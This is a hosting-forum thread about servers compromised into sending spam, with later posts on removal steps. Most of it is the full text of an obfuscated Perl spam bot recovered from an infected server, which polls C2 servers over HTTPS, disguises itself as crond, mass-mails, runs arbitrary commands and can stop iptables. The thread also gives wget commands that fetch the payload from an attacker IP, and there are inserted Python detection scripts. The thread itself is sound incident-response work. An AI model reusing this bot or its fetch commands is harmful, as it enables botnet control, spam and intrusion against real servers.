
Spam from hole in Plesk?

Of course, here is the code; I hope you can extract valid info from it:

The code is too long, so I'm posting it in two parts.

First:

#!/usr/bin/perl
use strict;
use Socket;
use CGI;
srand(time ^ $$ ^ unpack "%L*", `ps axww | gzip`);
$SIG{PIPE}=
sub {die "Broken pipe"};

$ENV{PATH}=$ENV{PATH}.":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
my $g05a = ($< == 0);
my $jdek = ((getpwuid($>))[0]);
my $kk6i = 0;
$kk6i = length($ARGV[0]) if ($ARGV[0] =~ /^ +$/);
my $jfb3 = int(rand(2147483647));
my ($i301, $h2aa, $anni);
my $j9md = "sb2";
my $i31d=443;
my $f97a="/b/index.php";
my $gmmp='/tmp/...';
my $j89f="/usr/bin/crond ";
my $ik6k=0;
my $ff58=0;
my $j2l9=0;
my $be3d=0;
my $cibh=0;
my $ajgj=0;
my $b89m=50;
my $p="1234567890";
my $cnc9;
my $eg03="sendmail";
my $hjb8;
my $f83g;
my %ikad;
my $fn4m=39;
$ikad{'d_v'}=$fn4m;
$ikad{'d_w'}=$jdek;
$ikad{'d_rb'}=$kk6i;
$ikad{'d_pi'}=$$;
$ikad{'d_iv'}=$];

sub aao{print '['.localtime().'] ';
print @_;
}
sub aai{return 0 if !open(SIGNFH, ">$gmmp");
return 0 if !flock(SIGNFH, 2 | 4);
return 1;
}
sub ab4{my $cf30=shift;
my $dem6=shift;
my $bkpn=shift;
my $hc3f=shift;
my $g3ii=shift;
my $ck7e=$cf30->{'name'};
my $en2h=$cf30->{'addr'};
my $cahh=ab6(4);
my($bkpn, $amc9, $jn0e)=ab3($bkpn);
$hc3f=~s/\[\[firstname\]\]/$ck7e/g;
$hc3f=~s/\[\[id\]\]/$en2h/g;
$hc3f=~s/\[\[count\]\]/$g3ii/g;
$hc3f=~s/\[\[rand\]\]/$cahh/g;
$bkpn=~s/\[\[firstname\]\]/$ck7e/g;
$bkpn=~s/\[\[id\]\]/$en2h/g;
$bkpn=~s/\[\[count\]\]/$g3ii/g;
$bkpn=~s/\[\[rand\]\]/$cahh/g;
for(my $i=0;
$i<10;
$i++){my $ag69=$cf30->{'params'}->[$i];
$hc3f=~s/\[\[param$i\]\]/$ag69/g;
$bkpn=~s/\[\[param$i\]\]/$ag69/g;
}
$bkpn=ab8($bkpn, $amc9, $jn0e)
if($jn0e);
my $d2p3="From: $dem6|To: ".($ck7e ? "\"$ck7e\" <$en2h>" : "$en2h")."|
subject: $bkpn";
eval{open SENDMAIL, "| $eg03 -t";
print SENDMAIL "From: $dem6\n";
print SENDMAIL "To: ".($ck7e ? "\"$ck7e\" <$en2h>" : "$en2h")."\n";
print SENDMAIL "
subject: $bkpn\n";
print SENDMAIL "\n" if ($eg03 =~ /\/mail/);
print SENDMAIL "$hc3f";
close SENDMAIL;
};
if($@){my $j8f3=$@;
chomp $j8f3;
return 0;
}return 1;
}
sub aam{my $feli=shift;
my $c907=shift;
my @fmoc=@$c907;
my $dem6=shift @fmoc;
my $bkpn=shift @fmoc;
my $hc3f;
while(scalar(@fmoc)){my $idkj=shift @fmoc;
if($idkj eq $feli){last;
}$hc3f .=$idkj."\n";
}my @eck2;
while(scalar(@fmoc)){my $cf30={};
my $idkj=shift @fmoc;
my($bjgb, $g33h, @dh4b)=split /\t/, $idkj;
if(!$g33h){$g33h=$bjgb;
$bjgb=undef;
}$cf30->{'addr'}=$g33h;
$cf30->{'name'}=$bjgb if $bjgb;
$cf30->{'params'}=\@dh4b if(scalar(@dh4b));
push @eck2, $cf30 if($cf30->{'addr'});
}for(my $i=0;$i<scalar(@eck2);)
{if(ab4($eck2[$i], $dem6, $bkpn, $hc3f, $i)){$j2l9++;
$be3d++;
}else{$cibh++;
$ajgj++;
}$i++;
}if($g05a){`rm -f /var/mail/root /var/spool/mail/root /var/mail/mail /var/spool/mail/mail`;
}`rm -f ~/dead.letter`;
}
sub aaf{my $jpo2=sprintf($f83g." | grep -ci '<html'", "https://accounts.google.com/ServiceLogin?service=mail");
my($dlhb)=`$jpo2`;
chomp $dlhb;
return $dlhb;
}
sub abe{if($hjb8 eq "wget"){my($db8o)=`wget --version | head -n1 | grep -o "\\.[0-9]*" | grep -o "[0-9]*\$"`;
chomp $db8o;
$db8o=int($db8o);
$f83g="wget -q -O - -t 1 -T 60 ";
$f83g .="--no-check-certificate " if($db8o > 9);
$f83g .='"%s"';
}elsif($hjb8 eq "curl"){$f83g='curl -s -k --max-time 60 "%s"';
}elsif($hjb8 eq "fetch"){$f83g='fetch -T 60 -q -o - "%s"';
}}
sub ab5{my @if9d=('wget', 'curl', 'fetch');
undef $hjb8;
foreach my $c35d(@if9d){if($cnc9){my $kbol=`which $c35d`;
next if ($kbol !~ /^\//);
} $hjb8 = $c35d;
abe();
if (!aaf()) { undef $hjb8;
next;
} last;
} if (!$hjb8) { $hjb8 = "wget";
abe();
}$ikad{'d_br'}=$hjb8;
}my $c72n=0;

sub abc{return if(time() - $c72n < 3600);
$c72n=time();
$cnc9=`which which | grep -v alias | sed -e 's/^[[:space:]]*//'`;
ab5();
ab7();
aad() if($g05a);
my $h57d=`ps -xo command | grep -v grep | grep postfix/master | wc -l | sed -e 's/^[[:space:]]*//'`;
chomp $h57d;
if($h57d){$ikad{'d_ma'}='postfix';
if($cnc9){$h57d=`which sendmail.postfix`;
chomp $h57d;
$eg03 = $h57d if ($h57d =~ /^\/.*ab4.postfix$/);
} } else { $ikad{'d_ma'}='sendmail';
}$ikad{'d_mc'}=$eg03;
}
sub aad{my @g32h=("postfix", "sendmail");
foreach my $glno(@g32h){my $ip25=`service $glno status`;
chomp $ip25;
if ($ip25 =~ /running/i) { return $glno;
} } foreach my $glno (@g32h) { my $h1me = `service $glno start`;
chomp $h1me;
if ($h1me =~ /done/i || $h1me =~ /ok/i) { return $glno;
} } return undef;
}
sub ab7 { my @f9b1 = ('sendmail', 'mailx', 'mail');
my @b9b7=('/etc/', 'cron', '.cpan', '/lib', 'log.d', '/services/', '/cgi-bin/', 'mail-lock', 'mail-unlock', 'mail-touchlock', 'formail', 'traptoemail', 'run-mailcap', 'checksendmail', 'w3mmail.cgi');
my $cl7p;
foreach my $be1l(@f9b1){if($cnc9){my $bb27=`which $be1l`;
chomp $bb27;
if ($bb27 =~ /^(\/[^ ]+)/) { $eg03 = $1;
return 1;
} } $cl7p = "locate $be1l | head -n1000";
my @ehja=split /\n/, `$cl7p`;
$cl7p="find /bin/ /sbin/ /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin/ -type f -or -type l | grep $be1l ";
push @ehja, split /\n/, `$cl7p`;
chomp @ehja;
my @bc2l;
foreach my $ddl4 (@ehja) { next if (-d $ddl4);
next if (! -x $ddl4);
next if ($ddl4 =~ /\.so$/);
my $c986 = 0;
foreach my $j70k (@b9b7) { if ($ddl4 =~ /$j70k/) { $c986 = 1;
last;
} } next if $c986;
if ($ddl4 =~ /bin\// && $ddl4 =~ /$be1l$/) { $eg03 = $ddl4;
return 1;
} push (@bc2l,$ddl4);
} foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /bin\//) { $eg03 = $ddl4;
return 1;
} } foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /$be1l$/) { $eg03 = $ddl4;
return 1;
} } } return 0;
}

sub aac { my $idkj = shift;
my $jebb = shift;
if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1<<24)+($2<<16)+($3<<8)+($4);
} else { $jebb = int($jebb);
} my @e72l;
$e72l[0] = ((($jebb&0xFF000000)>>24)+15)%256;
$e72l[1] = ((($jebb&0x00FF0000)>>16)+13)%256;
$e72l[2] = ((($jebb&0x0000FF00)>>8)+52)%256;
$e72l[3] = ((($jebb&0x000000FF))+71)%256;
my $b0oj;
for (my $i = 0; $i < length($idkj); $i++)
{ my $j2n2 = ord(substr ($idkj, $i, 1));
my $d = int($j2n2^$e72l[$i%4]);
$b0oj .= sprintf("%02x", $d);
$e72l[($i+1)%4] = ($e72l[($i+1)%4]+$d)%256;
} return $b0oj;
}

sub aah { my $idkj = shift;
my $jebb = shift;
if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1<<24)+($2<<16)+($3<<8)+($4);
} else { $jebb = int($jebb);
} my @e72l;
$e72l[0] = ((($jebb&0xFF000000)>>24)+15)%256;
$e72l[1] = ((($jebb&0x00FF0000)>>16)+13)%256;
$e72l[2] = ((($jebb&0x0000FF00)>>8)+52)%256;
$e72l[3] = ((($jebb&0x000000FF))+71)%256;
my $b0oj;
for (my $i = 0;
$i < length($idkj)/2;
$i++) { my $j2n2 = hex(
substr ($idkj, $i*2, 2));
$e72l[($i+1)%4] = ($e72l[($i+1)%4]+$j2n2)%256;
$b0oj .= chr($j2n2^$e72l[$i%4]);
} return $b0oj;
}
sub ab1 ($;$)
{ if ($] >= 5.006) {
require bytes;
if (bytes::length($_[0]) > length($_[0]) || ($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/)) { require Carp;
Carp::croak("The Base64 encoding is only defined for bytes");
}}
use integer;
my $kfl6=$_[1];
$kfl6="\n" unless defined $kfl6;
my $b0oj=pack("u", $_[0]);
$b0oj=~s/^.//mg;
$b0oj=~s/\n//g;
$b0oj=~tr/\` -_/AA-Za-z0-9+\//;
my $foa6=(3 - length($_[0]) % 3) % 3;
$b0oj=~s/.{$foa6}$/'=' x $foa6/e if $foa6;
if(length $kfl6){$b0oj=~s/(.{1,76})/$1$kfl6/g;
}return $b0oj;
}
sub aal($){local($^W)=0;
use integer;
my $idkj=shift;
$idkj=~tr|A-Za-z0-9+=/||cd;
if(length($idkj) % 4){require Carp;
Carp::carp("Length of base64 data not a multiple of 4")}$idkj=~s/=+$//;
$idkj=~tr|A-Za-z0-9+/| -_|;
return "" unless length $idkj;
my $jkn8='';
my($i, $l);
$l=length($idkj) - 60;
for($i=0;
$i <=$l;
$i +=60){$jkn8 .="M" .
substr($idkj, $i, 60);
}$idkj=
substr($idkj, $i);
if($idkj ne ""){$jkn8 .=chr(32 + length($idkj)*3/4) . $idkj;
}return unpack("u", $jkn8);
}
sub ab3 { my $idkj = shift;
my ($amc9, $jn0e, $bo0f);
if ($idkj =~ /^=\?([^\?]+)\?([^\?]+)\?(.+)\?=$/i) { $amc9 = $1;
$jn0e = $2;
$bo0f = $3;
if (lc($jn0e) eq "b"){$idkj=aal($bo0f);
return($idkj, $amc9, $jn0e);
}}return($idkj, undef, undef);
}
sub ab8{my $idkj=shift;
my $amc9=shift;
my $jn0e=shift;
return '=?'.$amc9.'?'.$jn0e.'?'.ab1($idkj, '').'?=';
}
sub ab6{my $k1mp=shift;
my @g8c0=('a'..'z');
my $aldg;
foreach(1..$k1mp){$aldg.=$g8c0[rand @g8c0];
}return $aldg;
}
sub aak{my $a=shift;
my $b0oj=0;
$b0oj +=(ord(
substr($a,3,1)) & 0xFF);
$b0oj +=(ord(
substr($a,2,1)) & 0xFF) << 8;
$b0oj +=(ord(
substr($a,1,1)) & 0xFF) << 16;
$b0oj +=(ord(
substr($a,0,1)) & 0xFF) << 24;
return $b0oj;
}
sub abd{my $i301=shift;
my $c8hp=inet_aton($i301);
return(defined $c8hp)?inet_ntoa($c8hp):undef;
}
sub abb{my $i981=shift;
my $c35d=sprintf($f83g, $i981);
my @b0oj=`$c35d`;
chomp @b0oj;
return @b0oj;
}
sub aag{my $i981=shift;
my $g9d3=shift;
if($hjb8 eq "wget")
{`wget -q "$i981" -O "$g9d3"`;
}
elsif($hjb8 eq "curl"){`curl "$i981" > "$g9d3"`;
}
elsif($hjb8 eq "fetch"){`fetch -o "$g9d3" "$i981"`;
}}
 
And here is the second part


my $egf3=0;
my $aome=0;
my $h6j2;
my @i1l5=();

sub aba{
my $h2aa=$i31d;
undef $h6j2;
return($h6j2, $h2aa)

if(ab0($i1l5[$egf3], $h2aa));

my $do81=$egf3;
for($egf3=0;$egf3 < 10;$egf3++)
{if($egf3==4){my @p=split '',$p;
my $hf96=$p[6];
$hf96="$hf96$hf96.6$hf96.";
$hf96 .=$p[7].$p[9];
$hf96 .='.'.$p[2].$p[0];
return($hf96, $h2aa) if(aae($hf96, $h2aa));
}if($egf3==5){my @p=split '',$p;
my $hf96=$p[7].$p[4];
$hf96 .='.'.$p[1].$p[0].$p[3];
$hf96 .='.'.$p[7].$p[9];
$hf96 .='.'.$p[3];
return($hf96, $h2aa) if(aae($hf96, $h2aa));
}next if($do81==$egf3);
return($h6j2, $h2aa) if(ab0($i1l5[$egf3], $h2aa));
}my @p=split '',$p;
my $hf96=$p[1].$p[9];
$hf96=$hf96.$p[7].'.'.$hf96;
$hf96='.'.$hf96;
$hf96='.'.$p[1].$p[2].$hf96;
$hf96=$p[8].$p[3].$hf96;
return($hf96, $h2aa) if(aae($hf96, $h2aa));
$aome++;
return undef;
}my $icad=0;

sub aaj{($i301, $h2aa)=aba();
$icad=time() if($i301);
$ikad{'d_fd'}=$i301;
$ikad{'d_fi'}=$anni;
$ikad{'d_fp'}=$h2aa;
}
sub ab2{my($dfik, $gmnc)=(14400, 3600);
return if(time() - $icad < $dfik);
my($jkcg, $j4hp, $eg7k)=($i301, $h2aa, $anni);
aaj();
return if($i301 && $h2aa && $anni);
($i301, $h2aa, $anni)=($jkcg, $j4hp, $eg7k);
$icad=time() -($dfik - $gmnc);
}
sub ab0{my $i301=shift;
my $h2aa=shift;
my $don0="www.".$i301;
my $di2i=aak(inet_aton($don0));
if($di2i){my $gha6=ab6(10).".".$i301;
my $i2n2=aak(inet_aton($gha6));
if($i2n2 &&($i2n2==$di2i+1)){return aae($gha6, $h2aa);
}}return 0;
}
sub aae{$h6j2=shift;
my $h2aa=shift;
my $jlb4=int(rand(2147483647));
my $jebb=int(rand(2147483647));
$anni=abd($h6j2);
my $j7cf=$jlb4."*".$jfb3."*".$jebb;
my $f1i9=aac($j7cf, $anni);
my $i981="https://$h6j2:$h2aa/$f97a?id=$f1i9&check=1";
my @fmoc = abb($i981);
for (my $i=0; $i<scalar(@fmoc);$i++)
{
$fmoc[$i] = aah($fmoc[$i], $jebb);
}
my $ki8n = shift @fmoc;
if ($ki8n =~ /^SUCCESS$/) { $aome = 0;
return 1;
} return 0;
}
sub ab9 { my $jebb = shift;
my $jlb4 = shift;
my $bo0f;
foreach my $f (keys %ikad) { if ($f =~ /^d_(.+)$/) { my $ck7e = $1;
$bo0f .= ($bo0f?"|":"")."$ck7e=".$ikad{$f};
}}$bo0f="$jlb4*$bo0f" if($jlb4);
return aac($bo0f, $jebb);
}my $deie;

sub aap{my $g4jm=shift || time || 4357;
my @a=();
for(1..10000){use integer;
push @a, $g4jm & 0x7fffffff;
$g4jm *=69069;
}
$deie={offset=> 0, array=> \@a}}
sub aan{my $h11g=shift || 1.0;
aap() unless defined $deie;
$deie->{offset}=($deie->{offset}+ 1) % 10000;
my $fkc7=$deie->{offset};
my $a=$deie->{array};
$$a[$fkc7]=($$a[($fkc7 - 471) % 10000] ^ $$a[($fkc7 - 1586) % 10000] ^ $$a[($fkc7 - 6988) % 10000] ^ $$a[($fkc7 - 9689) % 10000]);
return $$a[$fkc7] * $h11g /(2**31);
}
sub aab{
my $i77j=($j9md eq "sb3")?115:15;
my $k1mp=10;
my @g8c0=('a'..'z');
aap(123987);
my $aldg;
for(my $i=-$i77j;$i<$b89m;$i++)
{
$aldg="";
foreach(1..$k1mp){
$aldg.=$g8c0[int(aan(scalar(@g8c0)))];
}
if($i >=0){my $ckeb=$aldg.".info";
push @i1l5, $ckeb;
}
}
}if(!aai()){exit;
}$0=$j89f if($j89f);
aab();
my $j4e7=0;
while(1){my $ki8n;
my @fmoc;
abc();
aaj() if(!$i301 || !$h2aa || !$anni);
ab2();
if(!$i301 || !$h2aa || !$anni){if($aome >=24){last;
}
sleep 3600;
next;
}
my $jlb4=int(rand(2147483647));
my $fcfa=int(rand(2147483647));
my $jebb=int(rand(2147483647));
my $j7cf=$jlb4."*".$jfb3."*".$jebb;
my $f1i9=aac($j7cf, $anni);
my $i981="https://$anni:$h2aa/$f97a?id=$f1i9";
$i981 .="&sent=$j2l9";
$i981 .="&notsent=$cibh";
$i981 .="&unknown=".CGI::escape($ik6k) if($ik6k);
$i981 .="&testsend=1" if($ff58);
$i981 .="&stat=".ab9($anni, $fcfa);
@fmoc=abb($i981);
for(my $i=0;$i<scalar(@fmoc);$i++)
{
$fmoc[$i]=aah($fmoc[$i], $jebb);
}
$ki8n=shift @fmoc;
if($ki8n){$j4e7=0;
$j2l9=0;
$cibh=0;
$ff58=0;
$ik6k=0;
}else{$j4e7++;
if($j4e7 > 3){$j4e7=0;
undef($i301);
undef($anni);
undef($h2aa);
}
$ki8n="SLEEP 60";
} if ($ki8n =~ /^SLEEP ([0-9]+)$/) { sleep $1;
next;
} elsif ($ki8n =~ /^RELOAD (.*)$/) { aag($1, "/tmp/ ");
close(SIGNFH);
system('cd /tmp;
nohup perl " " " " &');
sleep 5;
`rm -f "/tmp/ " /tmp/nohup.out`;
last;
} elsif ($ki8n =~ /^KILL$/) { last;
} elsif ($ki8n =~ /^SEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc);
undef @fmoc;
sleep 1;
next;
} elsif ($ki8n =~ /^TESTSEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc);
undef @fmoc;
$ff58 = 1;
sleep 1;
next;
} elsif ($ki8n =~ /^EXECUTE (.*)$/) { qx($1);
next;
} elsif ($ki8n =~ /^START SENDMAIL$/) { `service sendmail start`;
next;
} elsif ($ki8n =~ /^STOP IPTABLES$/) { `service iptables stop`;
next;
}$ik6k=$ki8n;
sleep 30;
if(!aae($i301, $h2aa)){undef($i301);
undef($anni);
undef($h2aa);
}
}
__END__
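A defender-side check for the process the script above hides behind, added here as an example and not part of the original post: the bot assigns $0 = "/usr/bin/crond " (trailing space included), which rewrites argv[0] only, while /proc/<pid>/exe still resolves to the real interpreter; it also flock()s a file literally named /tmp/... so that only one copy runs. The check below compares argv[0] against exe for every process and looks for that lock file; the /proc layout is Linux-specific and other users' exe links are readable only as root.

```python
import os

LOCK_FILE = "/tmp/..."          # opened and flock()ed by aai() in the script above
FAKE_NAME = "/usr/bin/crond "   # value of $j89f that the script assigns to $0

def is_masquerading(argv0: str, exe: str) -> bool:
    """True when argv[0] claims to be crond but the process is not crond.

    argv0: first NUL-separated field of /proc/<pid>/cmdline
    exe:   resolved target of the /proc/<pid>/exe symlink
    Assigning $0 in Perl rewrites argv[0] only; exe still points at perl.
    """
    if os.path.basename(argv0.rstrip()) != "crond":
        return False
    if argv0 != argv0.rstrip():          # trailing blank, exactly as in FAKE_NAME
        return True
    return os.path.basename(exe) != "crond"

def scan_proc(proc: str = "/proc"):
    """Return [(pid, argv0, exe)] for processes that fail the check above.

    Entries that cannot be read (process exited, kernel thread, or another
    user's process when not running as root) are skipped, not reported.
    """
    hits = []
    try:
        entries = os.listdir(proc)
    except OSError:                      # no /proc here (non-Linux or restricted)
        return hits
    for pid in entries:
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode("utf-8", "replace")
            exe = os.readlink(os.path.join(proc, pid, "exe"))
        except OSError:
            continue
        if is_masquerading(argv0, exe):
            hits.append((int(pid), argv0, exe))
    return hits

def lock_file_present(path: str = LOCK_FILE) -> bool:
    """A file named '...' in /tmp is the bot's single-instance lock; a leftover
    copy is inert by itself but is a strong sign the bot has run on this host."""
    return os.path.exists(path)

if __name__ == "__main__":
    for pid, argv0, exe in scan_proc():
        print(f"pid {pid}: argv[0]={argv0!r} but exe={exe}")
    if lock_file_present():
        print(f"{LOCK_FILE} exists: the bot has run on this host")
```

A hit from scan_proc() gives the PID to stop, which is what the later posts in this thread achieved only by rebooting; the malware scanner that removed the files on disk did not touch the running process.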
 
I have blocked the httpd user via cron.deny.
The wget command is used to load the script.
The parameters of wget are:
xxtp://38.101.26.226/test2.sh -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4099
and
xxtp://38.101.26.226/test2.jpg -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4092
 
A good job.
From whois: 38.101.26.226 is in COGENT-A, whose abuse email is [email protected]
We have to send emails telling them about this attack.

And of course I'll block the whole net in the firewall. Fail2ban has banned other IPs from this net.

Regards
 
Hello again!
I've managed to catch the intruder.
I bet that everyone who has this problem with the /tmp/sess_652...... file has WordPress installed.
Check the folder /wp-content/uploads for files named get.php and file.txt.
That's how they managed to send mail through our server.
I have a bunch of other files that seem to be shells. Anyway, I have looked inside those files and they are made pretty smartly. Most of them are rudimentarily encrypted with ord/chr and then evaluated with eval().
That's how they managed to get away from rootkit scanners.
I have deleted all those files and put an .htaccess in place with:

<IfModule mod_php5.c>
php_value engine off
</IfModule>
<IfModule mod_php4.c>
php_value engine off
</IfModule>

so no PHP script will be executed inside that folder. And of course the .htaccess has 644 permissions.
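A defender-side audit for the upload folder this post describes, added here as an example and not from the thread: it lists every PHP-executable file below a directory such as wp-content/uploads (there should be none), flags files that feed chr()/ord()-built strings to eval(), and checks that the directory's .htaccess carries the php_value engine off directive shown above. The folder and files built in demo() are constructed samples; the get.php there is an inert eval() of a chr()-assembled string, the same shape as the shells described, not a working one.

```python
import os
import re
import tempfile

# The post describes shells whose payload is assembled with chr()/ord()
# and handed to eval(); a benign uploads folder should hold no PHP at all.
EVAL_CALL = re.compile(r"\beval\s*\(", re.IGNORECASE)
CHR_OR_ORD = re.compile(r"\b(?:chr|ord)\s*\(", re.IGNORECASE)
ENGINE_OFF = re.compile(r"php_value\s+engine\s+off", re.IGNORECASE)
PHP_SUFFIXES = (".php", ".php5", ".phtml")

def looks_obfuscated(source: str, min_calls: int = 3) -> bool:
    """eval() plus several chr()/ord() calls is the pattern from the post."""
    return bool(EVAL_CALL.search(source)) and len(CHR_OR_ORD.findall(source)) >= min_calls

def find_php_files(root: str):
    """Every PHP-executable file below root, sorted for stable output."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_SUFFIXES):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)

def php_engine_disabled(root: str) -> bool:
    """True if root/.htaccess contains the post's 'php_value engine off'."""
    path = os.path.join(root, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        return bool(ENGINE_OFF.search(fh.read()))

def audit(root: str):
    """Return (php files, obfuscated php files, engine_off) for one folder."""
    php = find_php_files(root)
    obf = []
    for path in php:
        with open(path, encoding="utf-8", errors="replace") as fh:
            if looks_obfuscated(fh.read()):
                obf.append(path)
    return php, obf, php_engine_disabled(root)

def demo():
    """Run audit() on a constructed uploads folder; returns basenames only."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed samples: an inert eval() of a chr()-built string (the
        # shape of the get.php described), a normal upload, and the .htaccess.
        samples = {
            "get.php": "<?php eval(chr(101).chr(99).chr(104).chr(111)); ?>\n",
            "photo.jpg": "not php\n",
            ".htaccess": "<IfModule mod_php5.c>\nphp_value engine off\n</IfModule>\n",
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        php, obf, off = audit(root)
        return ([os.path.basename(p) for p in php], [os.path.basename(p) for p in obf], off)
```

The regex heuristic is deliberately loose, so treat hits as candidates to read by hand; note also that php_value in .htaccess is honoured only by mod_php, so on PHP-FPM or CGI setups the engine-off trick needs an equivalent in the pool or server configuration.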
 
A good job

Hi, a good job.
But I updated WP on the 10th and don't have these files; perhaps they were deleted during the update.
If this problem, or another like it, appears, I know where to look.

Thanks
 
I can confirm wordpress was installed on our box that was compromised. Our new mission critical production box will never again host a CMS. All old blogs are now proxy passed to trashable virtual machines.

Thanks everyone.
 
Hello.

Thank goodness I found this thread!

I have the same problem with this exact spammer. Going on 10 days now and I am beyond frustrated. My hosting provider is even stumped.
I do have wordpress installed.
I found and deleted the rogue .php files + added .htaccess files to prevent future scripts from running. (The rogue .php files were actually outside wordpress in my regular www.domain.com/images folder).

I used Maldetect which is great.
https://www.rfxn.com/projects/linux-malware-detect/

However, the spam continues at :30 after each hour.

I am using apache, webmin, postfix on this particular server. Postfix is temporarily stopped.

I've read through this entire thread several times and am looking for the solution(s) that have worked.
I'm still relatively new at commands, etc., so I am asking for help. I am a fast learner.

I'm hoping this not only helps me, but others who will undoubtedly get this too.

Where do I look, and what commands do I type in to get this son of a gun out of my machine? I have PuTTY and FTP programs.

Suggestions I've seen mentioned:

- kill the processes in memory/RAM, memory dump
- block httpd user by cron.deny / wget command
- grep for the sess_f652da7dd28dce7baeeae54a46ae4099
- tmp folder sessions
- etc.

Any assistance you can provide will be appreciated.

Jeff
 
I suppose you have looked for get.php (as another post says).

Reading these posts I found the solution: put apache (this is the httpd user) in cron.deny, so it cannot run crond and the spam is stopped.

And now I use separate tmp folders for every subdomain, and I erase these folders every few hours (with crons).

I checked every folder and every suspicious file on my site.

I wrapped sendmail, and now all mail passes before my eyes.

All fixes are in these posts. It is easy, read them.

regards
 
It's gone.

5 hours and no spam.

After running the linux anti-malware program I noted above to remove the rogue files, I created a simple file in notepad named cron.deny. I typed apache into the first line and uploaded to /etc/ folder. All emails, including spam & emails from my website forms, stopped. So I removed apache and left the blank cron.deny on the server. The spam started up again every 30 minutes.

I remembered a number of people saying to dump or kill the memory but I have no idea of the command to do that... so I rebooted my server. Simple as that.

That fixed it. The reboot cleared the memory.

No spam since. I hope it's permanent and not a cat and mouse game.

Even though the malware program removed the rogue files 4-5 days ago, it wasn't until I cleared the server's memory that the spam stopped.

I learned a lot thru this experience. Good knowledge gained.
 
Will adding apache to cron.deny alone fix this issue? Well, of course, together with updating WordPress? Has WordPress fixed the exploit?
 
It is not only in Plesk. I run a website built in Joomla 1.5.26. I know... it is outdated and a risk. My hosting company (Ek-hosting), using DirectAdmin, informed me about this spam. Neither I nor my host could find the problem. I was convinced that the malware files were uploaded, run and deleted. Never found a trace. I reinstalled an Akeeba backup from December 2013, after removing everything in public_html, to no result. It kept going on. Every 64 minutes a return notice, always to the same address (Unsubscribe.org).
My host accused me of being the spammer. He gave me a completely new spot on his servers, I reinstalled the 2013 version... No more spam. I sent my host a link to this article. Perhaps it might help him. And others as well... It is a nuisance! Even a bloody one.
 